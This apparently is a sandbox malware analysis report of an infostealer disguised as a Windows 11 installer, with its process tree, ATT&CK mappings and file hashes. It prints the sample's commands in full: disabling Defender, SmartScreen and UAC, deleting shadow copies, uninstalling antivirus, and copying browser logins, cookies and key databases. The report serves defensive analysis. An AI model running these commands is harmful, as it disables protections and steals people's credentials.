- Modifies data under HKEY_USERS
PID:4856 -
C:\Windows\system32\rEg.EXE"C:\Windows\system32\rEg.EXE" Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F9⤵
- Windows security bypass
PID:3444
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exerp.EXE /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1812 -
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4208 -
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4628 -
C:\Windows\system32\rEG.EXE"C:\Windows\system32\rEG.EXE" Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f9⤵PID:2012
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\.cmd""5⤵
- System Location Discovery: System Language Discovery
PID:4232 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c CUrL -S ipINFO.io/Ip6⤵
- System Location Discovery: System Language Discovery
PID:2112 -
C:\Windows\SysWOW64\curl.exeCUrL -S ipINFO.io/Ip7⤵
- System Location Discovery: System Language Discovery
PID:4220
-
-
-
-
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2516 -
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"6⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
PID:1500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\otu1nf8f1aiuixcc240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\t9h98yemuyztdw240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\daa28abfmq5240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\tj1lvkk7k240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\eyoc8n14idxv240662078.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\5b3nneef5a1240677406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\8l46la0gojeru240677406.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\ohs8a31fx4mtk240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\61mtomzkbt02ht1240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\qtc9j1wbnrqd240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\4l3szsqpghx240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\s0g722c9e4j4ta1w240699406.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ru85pw6tqsjob9j240705343.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\kbvc7t58g7u3ky240705343.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\eh3f6tu9lk240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\ntt3qcho6f240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\xrk0ql2wlekasq240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\1l01qph8240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\glwg4n1s240710578.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\3hcz52mjwq240719546.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\y88z1j32vusu172m240719546.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\8yuq9a72u6m1wcn240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\t4z4yu15iu595z240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\5koqj2nxry240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\58tds0jd240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\rz2ryztw8p3240728109.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\22zcsr95n0240734140.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\613ouc67y2mn36240734140.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\i9ovez9w3s3240740437.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\44a6tcmrfbdc5240740437.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\0mp2sm4y240740531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\8fkndkl8m240740531.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\yaz0qkm4r81lkx240754171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\gu51pkiwl2r9240754171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\6t7u44zsw7k4i99240754265.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\ku2vwbo3c33240754265.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1836
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\Desktop\BlockUse.temp\" \"C:\Users\Admin\AppData\Local\Temp\fmxfkx2joq6ublbyu8yv.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CheckpointEnter.hta\" \"C:\Users\Admin\AppData\Local\Temp\g8hku1jq3xo4li210huykb.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CompressConfirm.aiff\" \"C:\Users\Admin\AppData\Local\Temp\f06htrgpgf0ohtgj5rgy3k.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ConvertMerge.vsd\" \"C:\Users\Admin\AppData\Local\Temp\6l9b9kap2qesbbxrepr.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\DisableExport.rm\" \"C:\Users\Admin\AppData\Local\Temp\qijdw58b9daul52l035mwzlma61m1pkx.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\EnableHide.clr\" \"C:\Users\Admin\AppData\Local\Temp\a4e9fv6a6tsuzj1ik.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\EnterInitialize.vbe\" \"C:\Users\Admin\AppData\Local\Temp\vuqevmn7ikzd8qgl0cqknqdifrro5.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\FindSplit.emz\" \"C:\Users\Admin\AppData\Local\Temp\6qtn8jrhn2szxgf4x0flac5t5c.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\LimitSubmit.docx\" \"C:\Users\Admin\AppData\Local\Temp\2qj9ludo0g3451xxnp7mveo5c8e.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\MeasureReceive.txt\" \"C:\Users\Admin\AppData\Local\Temp\2608x592qgmq9o0b8k4.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ReadHide.jtx\" \"C:\Users\Admin\AppData\Local\Temp\d2i01njhgda6z0ft9.tmp\" -Force"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4208
-
-
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\tmp\.cmd" "2⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\system32\reg.exerEg Add "hKLm\sOftWare\microsOfT\windOws\CurrentVersiOn\polICIEs\sysTem" /v "COnsenTPrompTbEhAvIoradmin" /T rEG_dWOrd /d "0" /F3⤵
- UAC bypass
PID:4680
-
-
C:\Windows\system32\reg.exereg add "hKlm\sOfTwArE\miCrosoFt\WindoWs\currEntVersIon\PoLiCIes\sysTem" /v "COnsEnTPromptbehavIOrUser" /t reG_dWord /d "0" /f3⤵
- UAC bypass
PID:4952
-
-
C:\Windows\system32\reg.exerEg add "hKLm\soFtwArE\micrOsofT\WIndOWs\cUrrenTVersiOn\pOliCIes\system" /V "PromPTOnsECUredesKtoP" /t reG_dWOrd /d "0" /f3⤵
- UAC bypass
PID:2952
-
-
C:\Windows\system32\reg.exereg add "hkLm\soFtwArE\PoliCIes\micrOsoFt\WIndows dEFender\spYneT" /v "sUBmITsAmPlEsConsEnt" /t reg_dWord /d "2" /f3⤵PID:2868
-
-
C:\Windows\system32\reg.exereG Add "hKlm\softwAre\POlicIes\micrOsOfT\Windows dEfEnder\spyneT" /V "sPynetrePOrTIng" /t rEg_dwOrd /d "0" /f3⤵PID:5080
-
-
C:\Windows\system32\reg.exereG Add "hKlm\sOftwArE\pOlIcies\micrOsOFT\WIndOws dEFEndEr" /v "pUAproteCTiOn" /T rEG_dWord /d "0" /F3⤵PID:748
-
-
C:\Windows\system32\reg.exerEg add "hklm\sOfTware\PolIcIEs\micrOsofT\wIndOws dEfendEr\mPenGinE" /v "mpenABlEpUs" /T reg_dWord /d "0" /F3⤵PID:2816
-
-
C:\Windows\system32\reg.exerEG Add "hkLm\sofTwAre\pOLiCIEs\miCrosoFT\WindoWs\sYstEm" /v "EnABLesmArTsCrEen" /t reG_dword /d "0" /F3⤵PID:5012
-
-
C:\Windows\system32\reg.exereG Add "hKlm\sOFTWare\mIcrosoFT\windoWs\cUrrEntVErsiOn\eXPLOrer" /V "smArtscreenEnAblEd" /T reG_sz /d "off" /f3⤵PID:4856
-
-
C:\Windows\system32\reg.exerEG Add "hklm\sOftware\PoLiciEs\microsoFT\mrt" /V "donTofFerthrOuGhWUAU" /T "reG_dwOrd" /d "1" /f3⤵PID:2852
-
-
C:\Windows\system32\reg.exerEG Add "hklm\sOFTWare\polIcies\mICrOsoFt\mrt" /V "dontrEportInfECTIOnInFormAtion" /T "rEg_dWord" /d "1" /f3⤵PID:2180
-
-
C:\Windows\system32\reg.exereG add "hKlm\sOFtWAre\poLICies\mIcrosoft\WindoWs defendEr\uX configuration" /V "notIficatIon_suPPrEss" /t reG_dwOrd /d "1" /f3⤵PID:2212
-
-
C:\Windows\system32\reg.exerEG add "hklm\sOfTWArE\PoliCiEs\miCrosoFT\wIndoWs deFEndEr\WIndows deFender eXplOIT GUArd\ConTrolLed fOLdEr acCess" /v "enablEContrOlledfOLdEracCess" /t reg_dWord /d "0" /F3⤵PID:1572
-
-
C:\Windows\system32\reg.exereG add "hkLm\soFTWare\PoLicies\microsOFT\wIndOws dEfEndEr\rEpOrTInG" /v "dIsAblEEnhAncednOtIFicaTiOns" /T rEG_dword /d "1" /f3⤵PID:5044
-
-
C:\Windows\system32\reg.exereG add "hklm\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions" /V "dIsablEEnhAncEdnOtiFiCatiOns" /t rEg_dWord /d "1" /F3⤵
- Modifies Windows Defender notification settings
PID:4484
-
-
C:\Windows\system32\reg.exereg add "hKLm\softWarE\mIcrosOFt\wIndows dEfender securitY centEr\vIrUs and ThreAT ProtECtIOn" /v "FIlesBLocKednOTIfiCAtiOndIsablEd" /t rEG_dwOrd /d "1" /F3⤵PID:2704
-
-
C:\Windows\system32\reg.exerEG Add "hkLm\sofTware\miCrOsOFt\WIndoWs defEnder seCUriTY centEr\VIrus and threAT proTectiOn" /V "nOaCTIOnnOTIFiCAtIOndIsaBLed" /T rEG_dWord /d "1" /F3⤵PID:1184
-
-
C:\Windows\system32\reg.exereG add "hkLm\softwAre\mIcrosOFT\WindOWs dEfEnder sECUriTy center\virUs And ThrEAt PrOteCTIon" /v "summarynOtIfIcaTIOndIsABled" /t rEG_dwOrd /d "1" /F3⤵PID:2804
-
-
C:\Windows\system32\reg.exereg add "hklm\sOftwAre\PolICiEs\miCrOsofT\wIndows\exPlorEr" /V "dIsABLEnOtIFICaTIoncenTer" /T rEG_dWord /d "1" /F3⤵PID:4904
-
-
C:\Windows\system32\reg.exerEG add "hkCu\sOFtWarE\micrOsOFT\wIndOWs\currenTVersIOn\PUshnOTIfICatIOns" /v "ToastEnablEd" /t rEg_dWord /d "0" /f3⤵PID:4232
-
-
C:\Windows\system32\reg.exereg Add "hKLm\soFtwarE\pOlicIes\micrOsOfT\wIndOWs dEfEnder sEcuritY CEnter\VIrUs And ThrEAT prOTECTion" /v UIlOCKdOWn /T rEG_dWOrd /d 1 /f3⤵PID:3444
-
-
C:\Windows\system32\reg.exerEg add "hKlm\softWArE\POlICiEs\miCrOsofT\wIndOWs dEfEndEr seCUrItY cenTEr\ApP and Browser prOtEction" /V uIloCkdoWn /T rEg_dword /d 1 /f3⤵PID:1156
-
-
C:\Windows\system32\reg.exereG add "hklm\sOFtWarE\POliCiEs\microsofT\wIndows nT\sysTEmrestorE" /V "disAblECOnfIG" /T reG_dword /d "1" /F3⤵PID:5116
-
-
C:\Windows\system32\reg.exerEG add "hKLm\soFtWAre\POLIcIes\mICrOsOFT\wIndows nT\sYsTemresTore" /v "disabLEsr" /T rEg_dword /d "1" /F3⤵PID:4244
-
-
C:\Windows\system32\reg.exerEG add "hKcU\sOFTWare\mIcrosOFT\WIndoWs\CUrrenTvErsIon\poLiCiEs\aTTaChmenTs" /V "sAvezOnEInformATiOn" /T rEg_dwOrd /d "1" /F3⤵PID:4844
-
-
C:\Windows\system32\reg.exereG add "hKLm\sOfTWarE\mICrosOft\windOWs\CurrEnTvErsIon\POLiCIes\AtTachments" /V "sAvEzoneinfOrmATiOn" /T reg_dword /d "1" /f3⤵PID:2432
-
-
C:\Windows\system32\reg.exerEg Add "hKlm\soFTWArE\micrOsoFt\windOws\cUrrenTversiOn\POliciEs\AttachmEnTs" /v "scAnwithantivIrus" /t rEG_dwOrd /d "1" /f3⤵PID:2356
-
-
C:\Windows\system32\icacls.exeicaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /remOve:d "EvErYOnE" /t /C3⤵
- Modifies file permissions
PID:1880
-
-
C:\Windows\system32\icacls.exeiCaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /denY "eVEryOnE":(dE,dC) /t /c3⤵
- Modifies file permissions
PID:4060
-
-
C:\Windows\system32\vssadmin.exevssadmin dELETe shadOws /aLl /QuIEt3⤵
- Interacts with shadow copies
PID:1624
-
-
C:\Windows\system32\attrib.exeaTTrIb +S +H C:\TMP3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4836
-
-
C:\Windows\system32\find.exefind /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3456
-
-
C:\Windows\system32\find.exefind /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2028
-
-
C:\Windows\system32\find.exefind /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3676
-
-
C:\Windows\system32\find.exefind /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:1680
-
-
C:\Windows\system32\find.exefind /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3908
-
-
C:\Windows\system32\find.exefind /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3084
-
-
C:\Windows\system32\find.exefind /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3388
-
-
C:\Windows\system32\find.exefind /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:404
-
-
C:\Windows\system32\find.exefind /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:5112
-
-
C:\Windows\system32\find.exefind /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3816
-
-
C:\Windows\system32\find.exefind /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:832
-
-
C:\Windows\system32\find.exefind /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3628
-
-
C:\Windows\system32\find.exefind /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4968
-
-
C:\Windows\system32\find.exefind /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3540
-
-
C:\Windows\system32\find.exefind /c /i "unitedstates.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4116
-
-
C:\Windows\system32\find.exefind /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2364
-
-
C:\Windows\system32\find.exefind /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:3316
-
-
C:\Windows\system32\find.exefind /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:4340
-
-
C:\Windows\system32\find.exefind /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵PID:2000
-
-
C:\Windows\System32\Wbem\WMIC.exewmic product where name="ESET Security" call uninstall /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3352
-
-
C:\Windows\System32\Wbem\WMIC.exewmic product where name="Emsisoft Anti-Malware" call uninstall /nointeractive3⤵PID:308
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "emsisoft anti-malware" /f3⤵PID:1068
-
-
C:\Windows\system32\cmd.execmd /c "C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe" /uninstall /verysilent /f3⤵PID:1632
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4356
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify Tools
3Indicator Removal
2File Deletion
2Modify Registry
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD5548dd08570d121a65e82abb7171cae1c
SHA11a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA51237b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b
-
Filesize
1KB
MD5128b92209197100ce7aff24e1fcb531e
SHA13333b685091e506aba63a8fa480abcb3e387ca11
SHA256486ea5d4e5a060d5e2b325a29184963117b806eac4c3c8f2054e270977a6a76b
SHA51275aa70ee708b793be9a72a11a6e60c356181bbb93d6c2addd627606974048733f760850f4022926fc0f13b8a7dcdd94cd4b4a5374a0e57d236525649fe7a221f
-
Filesize
1KB
MD58acf8824ca8a7a5f6006d7027cb222df
SHA13e31fd65c6af8d1478abb028e45a0c6ddb9551d4
SHA256e60b40ecf21924803020ea1b8683bd03a447fbcb3b0f03973f55af26d460a0e4
SHA512a0011284c3deef2ce1a27f5788579a956892c64c88fe4107b90ce0c6d27b549f4adfcb5d157aa7e03db23b2f40a98b9e11846444a8edbef9f2b6775d300a89e1
-
Filesize
1KB
MD5873ba23f7e507f90cc56b43e045ec280
SHA190daa1586ebe076fca078be2bcaf7dce463653e3
SHA256ae29c38c2dd18cad6a19583cc849e538455fa3f0d87cfdd44894dc78c70c8097
SHA5122c458439159ebc6165b0917310b5ce47eefd1a025cd7f4bac9897d1bb985a72b917978cdfb37fca35d1d18c68d65e5b310ba8619c73a9db353605d5a930cdea5
-
Filesize
1KB
MD51c8ed1293d221f14d6142addad60bb7e
SHA16c236459abbd5617fe62f1c1898c5cdc072f0bcb
SHA2560992caa251b9bdf1f789dcf487dc29dad58f2376578573c037d106f608743dd5
SHA5123a0716fdbd3a62a065e6f1c5479a495e98bafdd026a3b2c33a0d181ba06069f8f14e910daa69000432da983a0bb87ea4db804562149d58049e393ce0206fe52c
-
Filesize
1KB
MD565e1866bd8c7557d214595156f8dce98
SHA1849b6f690d6f01bb67c4a5ed96dfacd18b576168
SHA25649fcf95b7c221741bf9c043e0eefcc5dddabcdf4aaff46b3f223b238d54e9118
SHA51261809063e29e1558fa5e297cf3e42bda75df4ed3e505222fa06dedda590772974cb4dbf872c9cd7fdf448f851f13fa5cf601b3adf8621fa4129b004995827f9b
-
Filesize
224KB
MD5c3f87d238aaed9863b6793637d2a2b70
SHA18125a310c5917614e923f0199c29ba9db940f4e5
SHA2561e09147618a4cb8a9f1934d7aa7e5a1d63e6b59d520f99d2463da9f985862e28
SHA512f1ea6ac293be1198fedaa6ab1a797e287d6ec3ad04b4918526a30e1dd53e39f3f7ae859695f5fc263f26433c40e1a295d7bea1ce8d3d15a55adc7c3227533b95
-
Filesize
29KB
MD531c5a8d7f0d900bfff09d437a7457478
SHA1c32f7abbc47949c340a2136bb8cc4787f05b1eff
SHA25689da44ebaa36a31740f9dbc585cefc3f55cf725f7d8d745b44ba259f0a1d8455
SHA5120089a7e5e0c3d7b8a226775f30983e901b323846d5263366672390ebbbd9212bd72bdb87c7baeeb09c6438317a66f5ccfc20cd898579190e6bb7579dd1cd158a
-
Filesize
14KB
MD586e766350f927b4fede500e323c47db3
